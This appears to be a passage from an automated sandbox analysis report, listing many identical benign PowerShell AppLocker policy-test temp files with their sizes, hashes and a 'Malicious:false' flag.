                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eiytepew.v20.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_emp3mvg4.kkc.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_erz3qxgt.wey.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_euvpfvaa.z1p.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fv4vvg24.oec.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fywj2fm5.ufc.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_grznvygz.et2.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ha11xrb0.hq5.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hbbbjths.2u1.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hillcfdj.w30.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hwo12cbp.mqh.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jmsbykrg.afw.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jnarrhcd.hje.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_knmbd50z.yff.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kqdcewrs.2ej.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_krzxkwt1.nig.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l1nv4hlp.d4u.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lmp4stlm.10h.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lyx1qkmk.qo0.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m3emhv14.bt1.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_meobfjx1.wny.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mnbmtwkz.epq.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o4hvgr03.wgx.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_okb3ghlg.zrb.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

